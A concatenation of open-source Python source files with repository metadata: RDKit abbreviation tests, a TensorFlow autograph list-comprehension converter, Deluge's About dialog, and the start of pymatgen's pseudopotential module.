self.defaultLinkers = rdAbbreviations.GetDefaultLinkers()
self.customLinkers = rdAbbreviations.ParseLinkers('''PEG3 *OCCOCCOCC* PEG3
Pent *CCCCC*
Cy *C1CCC(*)CC1 Cy''')
def testParsingAbbrevs(self):
defn = '''CO2Et C(=O)OCC
COOEt C(=O)OCC
OiBu OCC(C)C
tBu C(C)(C)C'''
abbrevs = rdAbbreviations.ParseAbbreviations(defn)
m = Chem.MolFromSmiles('CCC(=O)OCC')
nm = rdAbbreviations.CondenseMolAbbreviations(m, abbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*CC |$CO2Et;;$|')
def testCondense(self):
m = Chem.MolFromSmiles('FC(F)(F)CC(=O)O')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*C* |$CF3;;CO2H$|')
m = Chem.MolFromSmiles('CCC(F)(F)F')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs)
self.assertEqual(Chem.MolToCXSmiles(nm), '*C(F)(F)F |$Et;;;;$|')
# make sure we don't mess up chirality
m = Chem.MolFromSmiles('FC(F)(F)[C@](Cl)(F)I')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*[C@@](F)(Cl)I |$CF3;;;;$|')
def testLabel(self):
m = Chem.MolFromSmiles('CC(C)CC(F)(F)F')
nm = rdAbbreviations.LabelMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
sgs = Chem.GetMolSubstanceGroups(nm)
self.assertEqual(len(sgs), 2)
self.assertEqual(sgs[0].GetProp('TYPE'), "SUP")
self.assertEqual(sgs[0].GetProp('LABEL'), "iPr")
self.assertEqual(list(sgs[0].GetAtoms()), [1, 0, 2])
self.assertEqual(list(sgs[0].GetBonds()), [2])
aps = sgs[0].GetAttachPoints()
self.assertEqual(len(aps), 1)
self.assertEqual(aps[0].aIdx, 1)
self.assertEqual(aps[0].lvIdx, 3)
self.assertEqual(sgs[1].GetProp('TYPE'), "SUP")
self.assertEqual(sgs[1].GetProp('LABEL'), "CF3")
self.assertEqual(list(sgs[1].GetAtoms()), [4, 5, 6, 7])
self.assertEqual(list(sgs[1].GetBonds()), [3])
aps = sgs[1].GetAttachPoints()
self.assertEqual(len(aps), 1)
self.assertEqual(aps[0].aIdx, 4)
self.assertEqual(aps[0].lvIdx, 3)
def testCondenseLinkers(self):
m = Chem.MolFromSmiles('FCOCCOCCOCCCCCCCCCCl')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'FC**Cl |$;;PEG3;Hept;$|')
m = Chem.MolFromSmiles('COC1CCC(C)CC1')
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.customLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'C*OC |$;Cy;;$|')
def testAbbreviationsAndLinkers(self):
m = Chem.MolFromSmiles('COC1CCC(C)CC1')
# wouldn't normally do this in this order:
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '*C1CCC(C)CC1 |$OMe;;;;;;;$|')
nm = rdAbbreviations.CondenseMolAbbreviations(nm, self.customLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), '**C |$OMe;Cy;$|')
# This is a more logical order
nm = rdAbbreviations.CondenseMolAbbreviations(m, self.customLinkers, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'C*OC |$;Cy;;$|')
nm = rdAbbreviations.CondenseMolAbbreviations(nm, self.defaultAbbrevs, maxCoverage=1.0)
self.assertEqual(Chem.MolToCXSmiles(nm), 'C*OC |$;Cy;;$|')
def testAbbreviationsSubstanceGroups(self):
m = Chem.MolFromMolBlock('''
Mrv2014 09152006492D
0 0 0 0 0 999 V3000
M V30 BEGIN CTAB
M V30 COUNTS 7 7 1 0 0
M V30 BEGIN ATOM
M V30 1 C 5.25 -5.9858 0 0
M V30 2 C 4.48 -7.3196 0 0
M V30 3 C 6.02 -7.3196 0 0
M V30 4 F 8.6873 -8.8596 0 0
M V30 5 C 7.3537 -8.0896 0 0
M V30 6 F 6.02 -8.8596 0 0
M V30 7 F 7.3537 -6.5496 0 0
M V30 END ATOM
M V30 BEGIN BOND
M V30 1 1 1 2
M V30 2 1 3 1
M V30 3 1 2 3
M V30 4 1 3 5
M V30 5 1 4 5
M V30 6 1 5 6
M V30 7 1 5 7
M V30 END BOND
M V30 BEGIN SGROUP
M V30 1 SUP 0 ATOMS=(4 4 5 6 7) SAP=(3 5 3 1) XBONDS=(1 4) LABEL=CF3
M V30 END SGROUP
M V30 END CTAB
M END''')
nm = rdAbbreviations.CondenseAbbreviationSubstanceGroups(m)
nm.RemoveAllConformers() # avoid coords in CXSMILES
self.assertEqual(Chem.MolToCXSmiles(nm), '*C1CC1 |$CF3;;;$|')
def testGithub3692(self):
defaults = rdAbbreviations.GetDefaultAbbreviations()
self.assertIsNotNone(defaults[0].mol)
lbls = [x.label for x in defaults]
self.assertIn('CO2Et', lbls)
idx = lbls.index('CO2Et')
self.assertEqual(Chem.MolToSmiles(defaults[idx].mol), '*C(=O)OCC')
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
bp-kelley/rdkit
|
Code/GraphMol/Abbreviations/Wrap/testAbbreviations.py
|
Python
|
bsd-3-clause
| 5,160
|
[
"RDKit"
] |
f15b380eadae1eb1d3da7d83de5f6c3525a1905fab1e165a073c7ee457237b05
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Lowers list comprehensions into for and if statements.
Example:
result = [x * x for x in xs]
becomes
result = []
for x in xs:
elt = x * x
result.append(elt)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.autograph.core import converter
from tensorflow.contrib.autograph.pyct import templates
# TODO(mdan): This should convert directly to operator calls.
class ListCompTransformer(converter.Base):
"""Lowers list comprehensions into standard control flow."""
def visit_Assign(self, node):
if not isinstance(node.value, gast.ListComp):
return self.generic_visit(node)
if len(node.targets) > 1:
raise NotImplementedError('multiple assignments')
target, = node.targets
list_comp_node = node.value
template = """
target = []
"""
initialization = templates.replace(template, target=target)
template = """
target.append(elt)
"""
body = templates.replace(template, target=target, elt=list_comp_node.elt)
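# Build the loop nest from the inside out: the comprehension's last generator
# is the innermost loop, hence the reversed() iteration over generators/ifs.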
for gen in reversed(list_comp_node.generators):
for gen_if in reversed(gen.ifs):
template = """
if test:
body
"""
body = templates.replace(template, test=gen_if, body=body)
template = """
for target in iter_:
body
"""
body = templates.replace(
template, iter_=gen.iter, target=gen.target, body=body)
return initialization + body
def transform(node, ctx):
return ListCompTransformer(ctx).visit(node)
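# Minimal usage sketch (assumed driver code, not part of this module): in practice the
# autograph pipeline supplies the conversion context, but conceptually the pass runs as:
#
#   import ast
#   node = gast.ast_to_gast(ast.parse("result = [x * x for x in xs]"))
#   node = transform(node, ctx)  # ctx: the conversion context built by the pipeline
#
# After the pass, the single Assign node is replaced by the list initialization followed
# by the nested for/if statements generated from the comprehension's generators.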
|
jart/tensorflow
|
tensorflow/contrib/autograph/converters/list_comprehensions.py
|
Python
|
apache-2.0
| 2,297
|
[
"VisIt"
] |
968e34ad9f3c6a60715489e114b679c454567bf8c1d3c31c133f4e1657bb297d
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007 Marcos Pinto ('markybob') <markybob@gmail.com>
#
# This file is part of Deluge and is licensed under GNU General Public License 3.0, or later, with
# the additional special exception to link portions of this program with the OpenSSL library.
# See LICENSE for more details.
#
import gtk
import pygtk
from deluge.common import get_pixmap, get_version, open_url_in_browser
from deluge.ui.client import client
from deluge.ui.gtkui.common import get_deluge_icon
pygtk.require('2.0')
class AboutDialog:
def __init__(self):
def url_hook(dialog, url):
open_url_in_browser(url)
gtk.about_dialog_set_url_hook(url_hook)
self.about = gtk.AboutDialog()
self.about.set_position(gtk.WIN_POS_CENTER)
self.about.set_name("Deluge")
self.about.set_program_name(_("Deluge"))
version = get_version()
self.about.set_copyright(_("Copyright %s-%s Deluge Team") % (2007, 2014))
self.about.set_comments(
_("A peer-to-peer file sharing program\nutilizing the BitTorrent protocol.")
+ "\n\n" + _("Client:") + " %s\n" % version)
self.about.set_version(version)
self.about.set_authors([
_("Current Developers:"), "Andrew Resch", "Damien Churchill",
"John Garland", "Calum Lind", "", "libtorrent (libtorrent.org):",
"Arvid Norberg", "", _("Past Developers or Contributors:"),
"Zach Tibbitts", "Alon Zakai", "Marcos Pinto", "Alex Dedul",
"Sadrul Habib Chowdhury", "Ido Abramovich", "Martijn Voncken"
])
self.about.set_artists(["Andrew Wedderburn", "Andrew Resch"])
self.about.set_translator_credits("\n".join([
"Aaron Wang Shi", "abbigss", "ABCdatos", "Abcx", "Actam", "Adam",
"adaminikisi", "adi_oporanu", "Adrian Goll", "afby", "Ahmades",
"Ahmad Farghal", "Ahmad Gharbeia أحمد غربية", "akira", "Aki Sivula",
"Alan Pepelko", "Alberto", "Alberto Ferrer", "alcatr4z", "AlckO",
"Aleksej Korgenkov", "Alessio Treglia", "Alexander Ilyashov",
"Alexander Matveev", "Alexander Saltykov", "Alexander Taubenkorb",
"Alexander Telenga", "Alexander Yurtsev", "Alexandre Martani",
"Alexandre Rosenfeld", "Alexandre Sapata Carbonell",
"Alexey Osipov", "Alin Claudiu Radut", "allah", "AlSim",
"Alvaro Carrillanca P.", "A.Matveev", "Andras Hipsag",
"András Kárász", "Andrea Ratto", "Andreas Johansson", "Andreas Str",
"André F. Oliveira", "AndreiF", "andrewh", "Angel Guzman Maeso",
"Aníbal Deboni Neto", "animarval", "Antonio Cono", "antoniojreyes",
"Anton Shestakov", "Anton Yakutovich", "antou",
"Arkadiusz Kalinowski", "Artin", "artir", "Astur",
"Athanasios Lefteris", "Athmane MOKRAOUI (ButterflyOfFire)",
"Augusta Carla Klug", "Avoledo Marco", "axaard", "AxelRafn",
"Axezium", "Ayont", "b3rx", "Bae Taegil", "Bajusz Tamás",
"Balaam's Miracle", "Ballestein", "Bent Ole Fosse", "berto89",
"bigx", "Bjorn Inge Berg", "blackbird", "Blackeyed", "blackmx",
"BlueSky", "Blutheo", "bmhm", "bob00work", "boenki",
"Bogdan Bădic-Spătariu", "bonpu", "Boone", "boss01",
"Branislav Jovanović", "bronze", "brownie", "Brus46", "bumper",
"butely", "BXCracer", "c0nfidencal", "Can Kaya",
"Carlos Alexandro Becker", "cassianoleal", "Cédric.h",
"César Rubén", "chaoswizard", "Chen Tao", "chicha",
"Chien Cheng Wei", "Christian Kopac", "Christian Widell",
"Christoffer Brodd-Reijer", "christooss", "CityAceE", "Clopy",
"Clusty", "cnu", "Commandant", "Constantinos Koniaris", "Coolmax",
"cosmix", "Costin Chirvasuta", "CoVaLiDiTy", "cow_2001",
"Crispin Kirchner", "crom", "Cruster", "Cybolic", "Dan Bishop",
"Danek", "Dani", "Daniel Demarco", "Daniel Ferreira",
"Daniel Frank", "Daniel Holm", "Daniel Høyer Iversen",
"Daniel Marynicz", "Daniel Nylander", "Daniel Patriche",
"Daniel Schildt", "Daniil Sorokin", "Dante Díaz", "Daria Michalska",
"DarkenCZ", "Darren", "Daspah", "David Eurenius", "davidhjelm",
"David Machakhelidze", "Dawid Dziurdzia", "Daya Adianto ", "dcruz",
"Deady", "Dereck Wonnacott", "Devgru", "Devid Antonio Filoni"
"DevilDogTG", "di0rz`", "Dialecti Valsamou", "Diego Medeiros",
"Dkzoffy", "Dmitrij D. Czarkoff", "Dmitriy Geels",
"Dmitry Olyenyov", "Dominik Kozaczko", "Dominik Lübben", "doomster",
"Dorota Król", "Doyen Philippe", "Dread Knight", "DreamSonic",
"duan", "Duong Thanh An", "DvoglavaZver", "dwori", "dylansmrjones",
"Ebuntor", "Edgar Alejandro Jarquin Flores", "Eetu", "ekerazha",
"Elias Julkunen", "elparia", "Emberke", "Emiliano Goday Caneda",
"EndelWar", "eng.essam", "enubuntu", "ercangun", "Erdal Ronahi",
"ergin üresin", "Eric", "Éric Lassauge", "Erlend Finvåg", "Errdil",
"ethan shalev", "Evgeni Spasov", "ezekielnin", "Fabian Ordelmans",
"Fabio Mazanatti", "Fábio Nogueira", "FaCuZ", "Felipe Lerena",
"Fernando Pereira", "fjetland", "Florian Schäfer", "FoBoS", "Folke",
"Force", "fosk", "fragarray", "freddeg", "Frédéric Perrin",
"Fredrik Kilegran", "FreeAtMind", "Fulvio Ciucci", "Gabor Kelemen",
"Galatsanos Panagiotis", "Gaussian", "gdevitis", "Georg Brzyk",
"George Dumitrescu", "Georgi Arabadjiev", "Georg Sieber",
"Gerd Radecke", "Germán Heusdens", "Gianni Vialetto",
"Gigih Aji Ibrahim", "Giorgio Wicklein", "Giovanni Rapagnani",
"Giuseppe", "gl", "glen", "granjerox", "Green Fish", "greentea",
"Greyhound", "G. U.", "Guillaume BENOIT", "Guillaume Pelletier",
"Gustavo Henrique Klug", "gutocarvalho", "Guybrush88",
"Hans Rødtang", "HardDisk", "Hargas Gábor",
"Heitor Thury Barreiros Barbosa", "helios91940", "helix84",
"Helton Rodrigues", "Hendrik Luup", "Henrique Ferreiro",
"Henry Goury-Laffont", "Hezy Amiel", "hidro", "hoball", "hokten",
"Holmsss", "hristo.num", "Hubert Życiński", "Hyo", "Iarwain", "ibe",
"ibear", "Id2ndR", "Igor Zubarev", "IKON (Ion)", "imen",
"Ionuț Jula", "Isabelle STEVANT", "István Nyitrai", "Ivan Petrovic",
"Ivan Prignano", "IvaSerge", "jackmc", "Jacks0nxD", "Jack Shen",
"Jacky Yeung", "Jacques Stadler", "Janek Thomaschewski", "Jan Kaláb",
"Jan Niklas Hasse", "Jasper Groenewegen", "Javi Rodríguez",
"Jayasimha (ಜಯಸಿಂಹ)", "jeannich", "Jeff Bailes", "Jesse Zilstorff",
"Joan Duran", "João Santos", "Joar Bagge", "Joe Anderson",
"Joel Calado", "Johan Linde", "John Garland", "Jojan", "jollyr0ger",
"Jonas Bo Grimsgaard", "Jonas Granqvist", "Jonas Slivka",
"Jonathan Zeppettini", "Jørgen", "Jørgen Tellnes", "josé",
"José Geraldo Gouvêa", "José Iván León Islas", "José Lou C.",
"Jose Sun", "Jr.", "Jukka Kauppinen", "Julián Alarcón",
"julietgolf", "Jusic", "Justzupi", "Kaarel", "Kai Thomsen",
"Kalman Tarnay", "Kamil Páral", "Kane_F", "kaotiks@gmail.com",
"Kateikyoushii", "kaxhinaz", "Kazuhiro NISHIYAMA", "Kerberos",
"Keresztes Ákos", "kevintyk", "kiersie", "Kimbo^", "Kim Lübbe",
"kitzOgen", "Kjetil Rydland", "kluon", "kmikz", "Knedlyk",
"koleoptero", "Kőrösi Krisztián", "Kouta", "Krakatos",
"Krešo Kunjas", "kripken", "Kristaps", "Kristian Øllegaard",
"Kristoffer Egil Bonarjee", "Krzysztof Janowski",
"Krzysztof Zawada", "Larry Wei Liu", "laughterwym", "Laur Mõtus",
"lazka", "leandrud", "lê bình", "Le Coz Florent", "Leo", "liorda",
"LKRaider", "LoLo_SaG", "Long Tran", "Lorenz", "Low Kian Seong",
"Luca Andrea Rossi", "Luca Ferretti", "Lucky LIX", "Luis Gomes",
"Luis Reis", "Łukasz Wyszyński", "luojie-dune", "maaark",
"Maciej Chojnacki", "Maciej Meller", "Mads Peter Rommedahl",
"Major Kong", "Malaki", "malde", "Malte Lenz", "Mantas Kriaučiūnas",
"Mara Sorella", "Marcin", "Marcin Falkiewicz", "marcobra",
"Marco da Silva", "Marco de Moulin", "Marco Rodrigues", "Marcos",
"Marcos Escalier", "Marcos Pinto", "Marcus Ekstrom",
"Marek Dębowski", "Mário Buči", "Mario Munda", "Marius Andersen",
"Marius Hudea", "Marius Mihai", "Mariusz Cielecki",
"Mark Krapivner", "marko-markovic", "Markus Brummer",
"Markus Sutter", "Martin", "Martin Dybdal", "Martin Iglesias",
"Martin Lettner", "Martin Pihl", "Masoud Kalali", "mat02",
"Matej Urbančič", "Mathias-K", "Mathieu Arès",
"Mathieu D. (MatToufoutu)", "Mathijs", "Matrik", "Matteo Renzulli",
"Matteo Settenvini", "Matthew Gadd", "Matthias Benkard",
"Matthias Mailänder", "Mattias Ohlsson", "Mauro de Carvalho",
"Max Molchanov", "Me", "MercuryCC", "Mert Bozkurt", "Mert Dirik",
"MFX", "mhietar", "mibtha", "Michael Budde", "Michael Kaliszka",
"Michalis Makaronides", "Michał Tokarczyk", "Miguel Pires da Rosa",
"Mihai Capotă", "Miika Metsälä", "Mikael Fernblad", "Mike Sierra",
"mikhalek", "Milan Prvulović", "Milo Casagrande", "Mindaugas",
"Miroslav Matejaš", "misel", "mithras", "Mitja Pagon", "M.Kitchen",
"Mohamed Magdy", "moonkey", "MrBlonde", "muczy", "Münir Ekinci",
"Mustafa Temizel", "mvoncken", "Mytonn", "NagyMarton", "neaion",
"Neil Lin", "Nemo", "Nerijus Arlauskas", "Nicklas Larsson",
"Nicolaj Wyke", "Nicola Piovesan", "Nicolas Sabatier",
"Nicolas Velin", "Nightfall", "NiKoB", "Nikolai M. Riabov",
"Niko_Thien", "niska", "Nithir", "noisemonkey", "nomemohes",
"nosense", "null", "Nuno Estêvão", "Nuno Santos", "nxxs", "nyo",
"obo", "Ojan", "Olav Andreas Lindekleiv", "oldbeggar",
"Olivier FAURAX", "orphe", "osantana", "Osman Tosun", "OssiR",
"otypoks", "ounn", "Oz123", "Özgür BASKIN", "Pablo Carmona A.",
"Pablo Ledesma", "Pablo Navarro Castillo", "Paco Molinero",
"Pål-Eivind Johnsen", "pano", "Paolo Naldini", "Paracelsus",
"Patryk13_03", "Patryk Skorupa", "PattogoTehen", "Paul Lange",
"Pavcio", "Paweł Wysocki", "Pedro Brites Moita",
"Pedro Clemente Pereira Neto", "Pekka \"PEXI\" Niemistö", "Penegal",
"Penzo", "perdido", "Peter Kotrcka", "Peter Skov",
"Peter Van den Bosch", "Petter Eklund", "Petter Viklund",
"phatsphere", "Phenomen", "Philipi", "Philippides Homer", "phoenix",
"pidi", "Pierre Quillery", "Pierre Rudloff", "Pierre Slamich",
"Pietrao", "Piotr Strębski", "Piotr Wicijowski", "Pittmann Tamás",
"Playmolas", "Prescott", "Prescott_SK", "pronull",
"Przemysław Kulczycki", "Pumy", "pushpika", "PY", "qubicllj",
"r21vo", "Rafał Barański", "rainofchaos", "Rajbir", "ras0ir", "Rat",
"rd1381", "Renato", "Rene Hennig", "Rene Pärts", "Ricardo Duarte",
"Richard", "Robert Hrovat", "Roberth Sjonøy", "Robert Lundmark",
"Robin Jakobsson", "Robin Kåveland", "Rodrigo Donado",
"Roel Groeneveld", "rohmaru", "Rolf Christensen", "Rolf Leggewie",
"Roni Kantis", "Ronmi", "Rostislav Raykov", "royto", "RuiAmaro",
"Rui Araújo", "Rui Moura", "Rune Svendsen", "Rusna", "Rytis",
"Sabirov Mikhail", "salseeg", "Sami Koskinen", "Samir van de Sand",
"Samuel Arroyo Acuña", "Samuel R. C. Vale", "Sanel", "Santi",
"Santi Martínez Cantelli", "Sardan", "Sargate Kanogan",
"Sarmad Jari", "Saša Bodiroža", "sat0shi", "Saulius Pranckevičius",
"Savvas Radevic", "Sebastian Krauß", "Sebastián Porta", "Sedir",
"Sefa Denizoğlu", "sekolands", "Selim Suerkan", "semsomi",
"Sergii Golovatiuk", "setarcos", "Sheki", "Shironeko", "Shlomil",
"silfiriel", "Simone Tolotti", "Simone Vendemia", "sirkubador",
"Sławomir Więch", "slip", "slyon", "smoke", "Sonja", "spectral",
"spin_555", "spitf1r3", "Spiziuz", "Spyros Theodoritsis", "SqUe",
"Squigly", "srtck", "Stefan Horning", "Stefano Maggiolo",
"Stefano Roberto Soleti", "steinberger", "Stéphane Travostino",
"Stephan Klein", "Steven De Winter", "Stevie", "Stian24", "stylius",
"Sukarn Maini", "Sunjae Park", "Susana Pereira", "szymon siglowy",
"takercena", "TAS", "Taygeto", "temy4", "texxxxxx", "thamood",
"Thanos Chatziathanassiou", "Tharawut Paripaiboon", "Theodoor",
"Théophane Anestis", "Thor Marius K. Høgås", "Tiago Silva",
"Tiago Sousa", "Tikkel", "tim__b", "Tim Bordemann", "Tim Fuchs",
"Tim Kornhammar", "Timo", "Timo Jyrinki", "Timothy Babych",
"TitkosRejtozo", "Tom", "Tomas Gustavsson", "Tomas Valentukevičius",
"Tomasz Dominikowski", "Tomislav Plavčić", "Tom Mannerhagen",
"Tommy Mikkelsen", "Tom Verdaat", "Tony Manco",
"Tor Erling H. Opsahl", "Toudi", "tqm_z", "Trapanator", "Tribaal",
"Triton", "TuniX12", "Tuomo Sipola", "turbojugend_gr", "Turtle.net",
"twilight", "tymmej", "Ulrik", "Umarzuki Mochlis", "unikob",
"Vadim Gusev", "Vagi", "Valentin Bora", "Valmantas Palikša",
"VASKITTU", "Vassilis Skoullis", "vetal17", "vicedo", "viki",
"villads hamann", "Vincent Garibal", "Vincent Ortalda", "vinchi007",
"Vinícius de Figueiredo Silva", "Vinzenz Vietzke", "virtoo",
"virtual_spirit", "Vitor Caike", "Vitor Lamas Gatti",
"Vladimir Lazic", "Vladimir Sharshov", "Wanderlust", "Wander Nauta",
"Ward De Ridder", "WebCrusader", "webdr", "Wentao Tang", "wilana",
"Wilfredo Ernesto Guerrero Campos", "Wim Champagne", "World Sucks",
"Xabi Ezpeleta", "Xavi de Moner", "XavierToo", "XChesser",
"Xiaodong Xu", "xyb", "Yaron", "Yasen Pramatarov", "YesPoX",
"Yuren Ju", "Yves MATHIEU", "zekopeko", "zhuqin", "Zissan",
"Γιάννης Κατσαμπίρης", "Артём Попов", "Миша", "Шаймарданов Максим",
"蔡查理"
]))
self.about.set_wrap_license(True)
self.about.set_license(_(
"This program is free software; you can redistribute it and/or "
"modify it under the terms of the GNU General Public License as "
"published by the Free Software Foundation; either version 3 of "
"the License, or (at your option) any later version. \n\n"
"This program "
"is distributed in the hope that it will be useful, but WITHOUT "
"ANY WARRANTY; without even the implied warranty of "
"MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU "
"General Public License for more details. \n\n"
"You should have received "
"a copy of the GNU General Public License along with this program; "
"if not, see <http://www.gnu.org/licenses>. \n\n"
"In addition, as a "
"special exception, the copyright holders give permission to link "
"the code of portions of this program with the OpenSSL library. "
"You must obey the GNU General Public License in all respects for "
"all of the code used other than OpenSSL. \n\n"
"If you modify file(s) "
"with this exception, you may extend this exception to your "
"version of the file(s), but you are not obligated to do so. If "
"you do not wish to do so, delete this exception statement from "
"your version. If you delete this exception statement from all "
"source files in the program, then also delete it here."
))
self.about.set_website("http://deluge-torrent.org")
self.about.set_website_label("deluge-torrent.org")
self.about.set_icon(get_deluge_icon())
self.about.set_logo(gtk.gdk.pixbuf_new_from_file(get_pixmap("deluge-about.png")))
if client.connected():
if not client.is_classicmode():
self.about.set_comments(
self.about.get_comments() + _("Server:") + " %coreversion%\n")
self.about.set_comments(
self.about.get_comments() + "\n" + _("libtorrent:") + " %ltversion%\n")
def on_lt_version(result):
c = self.about.get_comments()
c = c.replace("%ltversion%", result)
self.about.set_comments(c)
def on_info(result):
c = self.about.get_comments()
c = c.replace("%coreversion%", result)
self.about.set_comments(c)
client.core.get_libtorrent_version().addCallback(on_lt_version)
if not client.is_classicmode():
client.daemon.info().addCallback(on_info)
else:
client.core.get_libtorrent_version().addCallback(on_lt_version)
def run(self):
self.about.show_all()
self.about.run()
self.about.destroy()
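# Illustrative usage sketch (assumed caller, not part of this module): the dialog is
# normally opened from a GTK menu handler, roughly:
#
#   dialog = AboutDialog()
#   dialog.run()  # shows the dialog, blocks until it is closed, then destroys it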
|
bendykst/deluge
|
deluge/ui/gtkui/aboutdialog.py
|
Python
|
gpl-3.0
| 17,847
|
[
"Gaussian"
] |
7ff7edb59dfb2d03ebae0650e708dbd96d2e09b783e502d11627730450f9278d
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module provides objects describing the basic parameters of the
pseudopotentials used in Abinit, and a parser to instantiate pseudopotential objects.
"""
import abc
import collections
import json
import logging
import os
import sys
import numpy as np
from collections import OrderedDict, defaultdict, namedtuple
from monty.collections import AttrDict, Namespace
from tabulate import tabulate
#from monty.dev import deprecated
from monty.functools import lazy_property
from monty.itertools import iterator_from_slice
from monty.json import MSONable, MontyDecoder
from monty.os.path import find_exts
from monty.string import list_strings, is_string
from pymatgen.core.periodic_table import Element
from pymatgen.core.xcfunc import XcFunc
from pymatgen.util.serialization import pmg_serialize
from pymatgen.util.plotting import add_fig_kwargs, get_ax_fig_plt
logger = logging.getLogger(__name__)
__all__ = [
"Pseudo",
"PseudoTable",
]
__author__ = "Matteo Giantomassi"
__version__ = "0.1"
__maintainer__ = "Matteo Giantomassi"
# Tools and helper functions.
def straceback():
"""Returns a string with the traceback."""
import traceback
return "\n".join((traceback.format_exc(), str(sys.exc_info()[0])))
def _read_nlines(filename, nlines):
"""
Read at most nlines lines from file filename.
If nlines is < 0, the entire file is read.
"""
if nlines < 0:
with open(filename, 'r') as fh:
return fh.readlines()
lines = []
with open(filename, 'r') as fh:
for lineno, line in enumerate(fh):
if lineno == nlines: break
lines.append(line)
return lines
_l2str = {
0: "s",
1: "p",
2: "d",
3: "f",
4: "g",
5: "h",
6: "i",
}
_str2l = {v: k for k, v in _l2str.items()}
def l2str(l):
"""Convert the angular momentum l (int) to string."""
try:
return _l2str[l]
except KeyError:
return "Unknown angular momentum, received l = %s" % l
def str2l(s):
"""Convert a string to the angular momentum l (int)"""
return _str2l[s]
class Pseudo(MSONable, metaclass=abc.ABCMeta):
"""
Abstract base class defining the methods that must be
implemented by the concrete pseudopotential sub-classes.
"""
@classmethod
def as_pseudo(cls, obj):
"""
Convert obj into a pseudo. Accepts:
* Pseudo object.
* string defining a valid path.
"""
return obj if isinstance(obj, cls) else cls.from_file(obj)
@staticmethod
def from_file(filename):
"""
Build an instance of a concrete Pseudo subclass from filename.
Note: the parser knows the concrete class that should be instantiated
Client code should rely on the abstract interface provided by Pseudo.
"""
return PseudoParser().parse(filename)
def __eq__(self, other):
if other is None: return False
return (self.md5 == other.md5 and
self.__class__ == other.__class__ and
self.Z == other.Z and
self.Z_val == other.Z_val and
self.l_max == other.l_max )
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
try:
return "<%s at %s>" % (self.__class__.__name__, os.path.relpath(self.filepath))
except:
# relpath can fail if the code is executed in daemon mode.
return "<%s at %s>" % (self.__class__.__name__, self.filepath)
def __str__(self):
return self.to_string()
def to_string(self, verbose=0):
"""String representation."""
lines = []
app = lines.append
app("<%s: %s>" % (self.__class__.__name__, self.basename))
app(" summary: " + self.summary.strip())
app(" number of valence electrons: %s" % self.Z_val)
app(" maximum angular momentum: %s" % l2str(self.l_max))
app(" angular momentum for local part: %s" % l2str(self.l_local))
app(" XC correlation: %s" % self.xc)
app(" supports spin-orbit: %s" % self.supports_soc)
if self.isnc:
app(" radius for non-linear core correction: %s" % self.nlcc_radius)
if self.has_hints:
for accuracy in ("low", "normal", "high"):
hint = self.hint_for_accuracy(accuracy=accuracy)
app(" hint for %s accuracy: %s" % (accuracy, str(hint)))
return "\n".join(lines)
@property
@abc.abstractmethod
def summary(self):
"""String summarizing the most important properties."""
@property
def filepath(self):
return os.path.abspath(self.path)
@property
def basename(self):
"""File basename."""
return os.path.basename(self.filepath)
@property
@abc.abstractmethod
def Z(self):
"""The atomic number of the atom."""
@property
@abc.abstractmethod
def Z_val(self):
"""Valence charge."""
@property
def type(self):
return self.__class__.__name__
@property
def element(self):
"""Pymatgen :class:`Element`."""
try:
return Element.from_Z(self.Z)
except (KeyError, IndexError):
return Element.from_Z(int(self.Z))
@property
def symbol(self):
"""Element symbol."""
return self.element.symbol
@property
@abc.abstractmethod
def l_max(self):
"""Maximum angular momentum."""
@property
@abc.abstractmethod
def l_local(self):
"""Angular momentum used for the local part."""
@property
def isnc(self):
"""True if norm-conserving pseudopotential."""
return isinstance(self, NcPseudo)
@property
def ispaw(self):
"""True if PAW pseudopotential."""
return isinstance(self, PawPseudo)
@lazy_property
def md5(self):
"""MD5 hash value."""
#if self.has_dojo_report and "md5" in self.dojo_report: return self.dojo_report["md5"]
return self.compute_md5()
def compute_md5(self):
"""Compute and erturn MD5 hash value."""
import hashlib
with open(self.path, "rt") as fh:
text = fh.read()
m = hashlib.md5(text.encode("utf-8"))
return m.hexdigest()
@property
@abc.abstractmethod
def supports_soc(self):
"""
True if the pseudo can be used in a calculation with spin-orbit coupling.
Base classes should provide a concrete implementation that computes this value.
"""
@pmg_serialize
def as_dict(self, **kwargs):
return dict(
basename=self.basename,
type=self.type,
symbol=self.symbol,
Z=self.Z,
Z_val=self.Z_val,
l_max=self.l_max,
md5=self.md5,
filepath=self.filepath,
#xc=self.xc.as_dict(),
)
@classmethod
def from_dict(cls, d):
new = cls.from_file(d['filepath'])
# Consistency test based on md5
if "md5" in d and d["md5"] != new.md5:
raise ValueError("The md5 found in file does not agree with the one in dict\n"
"Received %s\nComputed %s" % (d["md5"], new.md5))
return new
def as_tmpfile(self, tmpdir=None):
"""
